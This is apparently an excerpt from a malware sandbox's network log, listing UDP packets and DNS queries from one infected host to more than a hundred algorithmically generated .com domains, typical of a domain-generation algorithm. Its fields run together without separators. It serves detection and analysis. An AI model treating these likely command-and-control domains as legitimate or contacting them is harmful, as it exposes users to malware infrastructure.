                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961740017 CEST5036453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.963972092 CEST5050953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.965563059 CEST53513751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.965818882 CEST5687553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966006994 CEST5928853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966203928 CEST5464953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966407061 CEST6538753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966619015 CEST5274853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.966708899 CEST6177753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967119932 CEST5330153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967308998 CEST5371253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967487097 CEST5585153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.967730999 CEST6375653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.968014002 CEST5930953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.969034910 CEST53525241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.970747948 CEST53580941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.971060038 CEST53554461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.971616030 CEST53503641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.975194931 CEST53592881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.975478888 CEST53568751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.976526022 CEST53617771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.977266073 CEST53527481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.977782965 CEST53637561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.979087114 CEST53593091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.983071089 CEST53537121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.994971037 CEST53505091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.996356010 CEST53546491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.997294903 CEST53533011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.997968912 CEST53653871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:35.121479988 CEST53501961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:35.128478050 CEST53558511.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.314336061 CEST192.168.2.41.1.1.10x9a08Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.315342903 CEST192.168.2.41.1.1.10x9f20Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.315779924 CEST192.168.2.41.1.1.10x42e9Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.316831112 CEST192.168.2.41.1.1.10xf1f1Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.317259073 CEST192.168.2.41.1.1.10x6efbStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.319271088 CEST192.168.2.41.1.1.10xccc6Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.319617033 CEST192.168.2.41.1.1.10xb2e5Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.321590900 CEST192.168.2.41.1.1.10x80f0Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.323005915 CEST192.168.2.41.1.1.10x743Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.323353052 CEST192.168.2.41.1.1.10xc394Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.326039076 CEST192.168.2.41.1.1.10x8b28Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.334219933 CEST192.168.2.41.1.1.10x81fStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.334700108 CEST192.168.2.41.1.1.10x4a59Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.341459036 CEST192.168.2.41.1.1.10xc95dStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.378185034 CEST192.168.2.41.1.1.10x8db5Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.379475117 CEST192.168.2.41.1.1.10xc702Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.389413118 CEST192.168.2.41.1.1.10x9dc6Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.444623947 CEST192.168.2.41.1.1.10xaf49Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445197105 CEST192.168.2.41.1.1.10x41cStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445377111 CEST192.168.2.41.1.1.10xcc8aStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445550919 CEST192.168.2.41.1.1.10x19a0Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.445734024 CEST192.168.2.41.1.1.10xc5aStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446090937 CEST192.168.2.41.1.1.10x4158Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446290970 CEST192.168.2.41.1.1.10x2525Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446466923 CEST192.168.2.41.1.1.10xa785Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446748972 CEST192.168.2.41.1.1.10xdabStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.446974993 CEST192.168.2.41.1.1.10x85d5Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.447137117 CEST192.168.2.41.1.1.10x1825Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.447303057 CEST192.168.2.41.1.1.10xe650Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.448765993 CEST192.168.2.41.1.1.10xdc27Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.449157000 CEST192.168.2.41.1.1.10x9c80Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451003075 CEST192.168.2.41.1.1.10x47bbStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451359987 CEST192.168.2.41.1.1.10x5980Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.451738119 CEST192.168.2.41.1.1.10x7da5Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:44.452965021 CEST192.168.2.41.1.1.10xf73cStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.005652905 CEST192.168.2.41.1.1.10x7e00Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.005697966 CEST192.168.2.41.1.1.10xd312Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.036871910 CEST192.168.2.41.1.1.10x4a0dStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.037115097 CEST192.168.2.41.1.1.10xf0fStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.037168980 CEST192.168.2.41.1.1.10x43Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068929911 CEST192.168.2.41.1.1.10x12f4Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068963051 CEST192.168.2.41.1.1.10x931cStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.068994999 CEST192.168.2.41.1.1.10x4d5fStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.069335938 CEST192.168.2.41.1.1.10xf671Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.135119915 CEST192.168.2.41.1.1.10xb231Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.302848101 CEST192.168.2.41.1.1.10x98c9Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.443065882 CEST192.168.2.41.1.1.10x19a0Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.065428019 CEST192.168.2.41.1.1.10x2beeStandard query (0)ww1.lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500469923 CEST192.168.2.41.1.1.10xa74bStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500570059 CEST192.168.2.41.1.1.10xf415Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500663996 CEST192.168.2.41.1.1.10x8a1aStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500782013 CEST192.168.2.41.1.1.10xd98dStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.547883034 CEST192.168.2.41.1.1.10x200Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.553045034 CEST192.168.2.41.1.1.10x92ddStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.594664097 CEST192.168.2.41.1.1.10xe7c4Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.610730886 CEST192.168.2.41.1.1.10xffbcStandard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.611857891 CEST192.168.2.41.1.1.10xd989Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.629679918 CEST192.168.2.41.1.1.10xd76bStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.786416054 CEST192.168.2.41.1.1.10xe8d7Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.788228989 CEST192.168.2.41.1.1.10x5939Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.809535027 CEST192.168.2.41.1.1.10xdf95Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.810296059 CEST192.168.2.41.1.1.10x789fStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.810656071 CEST192.168.2.41.1.1.10xb854Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.811458111 CEST192.168.2.41.1.1.10xc8c0Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812057018 CEST192.168.2.41.1.1.10x400fStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812418938 CEST192.168.2.41.1.1.10x14dStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812649965 CEST192.168.2.41.1.1.10x370fStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812741995 CEST192.168.2.41.1.1.10xe1e9Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.818890095 CEST192.168.2.41.1.1.10x437fStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.836227894 CEST192.168.2.41.1.1.10x40dcStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.837300062 CEST192.168.2.41.1.1.10xd7b9Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.837538958 CEST192.168.2.41.1.1.10x2c29Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.838946104 CEST192.168.2.41.1.1.10x6e73Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839154959 CEST192.168.2.41.1.1.10x3d9eStandard query (0)lyrysor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839468002 CEST192.168.2.41.1.1.10x81bbStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839636087 CEST192.168.2.41.1.1.10xe25fStandard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839782953 CEST192.168.2.41.1.1.10xdb69Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.857125998 CEST192.168.2.41.1.1.10xcdecStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.858899117 CEST192.168.2.41.1.1.10xff5aStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.858994007 CEST192.168.2.41.1.1.10xa0a2Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859114885 CEST192.168.2.41.1.1.10x622dStandard query (0)pupydeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859230042 CEST192.168.2.41.1.1.10x90e6Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859301090 CEST192.168.2.41.1.1.10x460eStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859405041 CEST192.168.2.41.1.1.10x2af4Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859519005 CEST192.168.2.41.1.1.10xa854Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.859608889 CEST192.168.2.41.1.1.10x9ebfStandard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.773489952 CEST192.168.2.41.1.1.10xf9a3Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.775496960 CEST192.168.2.41.1.1.10x8362Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.782902956 CEST192.168.2.41.1.1.10xa2b1Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.784171104 CEST192.168.2.41.1.1.10xb759Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.786549091 CEST192.168.2.41.1.1.10xa726Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.787426949 CEST192.168.2.41.1.1.10xcdf9Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788440943 CEST192.168.2.41.1.1.10x9b7Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.788645983 CEST192.168.2.41.1.1.10x49f2Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.791394949 CEST192.168.2.41.1.1.10x264eStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.793926001 CEST192.168.2.41.1.1.10x6547Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.794574022 CEST192.168.2.41.1.1.10x6ad0Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.802465916 CEST192.168.2.41.1.1.10x5a6dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.806516886 CEST192.168.2.41.1.1.10xbcceStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.811042070 CEST192.168.2.41.1.1.10x39f3Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.812926054 CEST192.168.2.41.1.1.10x7ec1Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.813493967 CEST192.168.2.41.1.1.10x6721Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.815409899 CEST192.168.2.41.1.1.10x6258Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.815685987 CEST192.168.2.41.1.1.10x7020Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.817760944 CEST192.168.2.41.1.1.10x205dStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.820208073 CEST192.168.2.41.1.1.10x3bc4Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.827785969 CEST192.168.2.41.1.1.10x1d69Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.829488993 CEST192.168.2.41.1.1.10x42b2Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.829902887 CEST192.168.2.41.1.1.10x1832Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.832957983 CEST192.168.2.41.1.1.10x8a5eStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.835247040 CEST192.168.2.41.1.1.10xd4acStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.836348057 CEST192.168.2.41.1.1.10x3e9bStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.836852074 CEST192.168.2.41.1.1.10xd047Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.844888926 CEST192.168.2.41.1.1.10x45a0Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845065117 CEST192.168.2.41.1.1.10x4040Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845308065 CEST192.168.2.41.1.1.10xa44eStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.845509052 CEST192.168.2.41.1.1.10x5902Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.847115040 CEST192.168.2.41.1.1.10x1910Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.852304935 CEST192.168.2.41.1.1.10xb072Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.853979111 CEST192.168.2.41.1.1.10x5485Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856489897 CEST192.168.2.41.1.1.10x8af0Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.856848955 CEST192.168.2.41.1.1.10xf9bfStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.857247114 CEST192.168.2.41.1.1.10x2b53Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.858541012 CEST192.168.2.41.1.1.10xde51Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.858892918 CEST192.168.2.41.1.1.10xf26aStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.859162092 CEST192.168.2.41.1.1.10x1524Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.859668016 CEST192.168.2.41.1.1.10xddc6Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.860861063 CEST192.168.2.41.1.1.10x6c3Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.336478949 CEST192.168.2.41.1.1.10xb664Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.336709023 CEST192.168.2.41.1.1.10x734dStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.337424040 CEST192.168.2.41.1.1.10xf2eaStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.340174913 CEST192.168.2.41.1.1.10x513eStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.344599009 CEST192.168.2.41.1.1.10x2e41Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.390568972 CEST192.168.2.41.1.1.10x9398Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.407099962 CEST192.168.2.41.1.1.10x5e4Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.408020020 CEST192.168.2.41.1.1.10x7bd5Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.408689976 CEST192.168.2.41.1.1.10xa332Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.410051107 CEST192.168.2.41.1.1.10xf4ffStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.413836002 CEST192.168.2.41.1.1.10x7e94Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.415410995 CEST192.168.2.41.1.1.10xe587Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416136980 CEST192.168.2.41.1.1.10x5e0bStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.416744947 CEST192.168.2.41.1.1.10xacbStandard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.418862104 CEST192.168.2.41.1.1.10x1717Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.419569969 CEST192.168.2.41.1.1.10xab60Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.420211077 CEST192.168.2.41.1.1.10x5f88Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.421284914 CEST192.168.2.41.1.1.10x8e66Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.423485994 CEST192.168.2.41.1.1.10xcdbcStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.424999952 CEST192.168.2.41.1.1.10x123fStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.434317112 CEST192.168.2.41.1.1.10xa0ecStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.434787035 CEST192.168.2.41.1.1.10x1893Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435144901 CEST192.168.2.41.1.1.10xbac6Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435270071 CEST192.168.2.41.1.1.10x4012Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435372114 CEST192.168.2.41.1.1.10xb510Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435511112 CEST192.168.2.41.1.1.10x25d3Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435676098 CEST192.168.2.41.1.1.10x176eStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435825109 CEST192.168.2.41.1.1.10x2cd3Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435971022 CEST192.168.2.41.1.1.10xf488Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436295033 CEST192.168.2.41.1.1.10x2628Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436497927 CEST192.168.2.41.1.1.10x6e3eStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436566114 CEST192.168.2.41.1.1.10x7c96Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
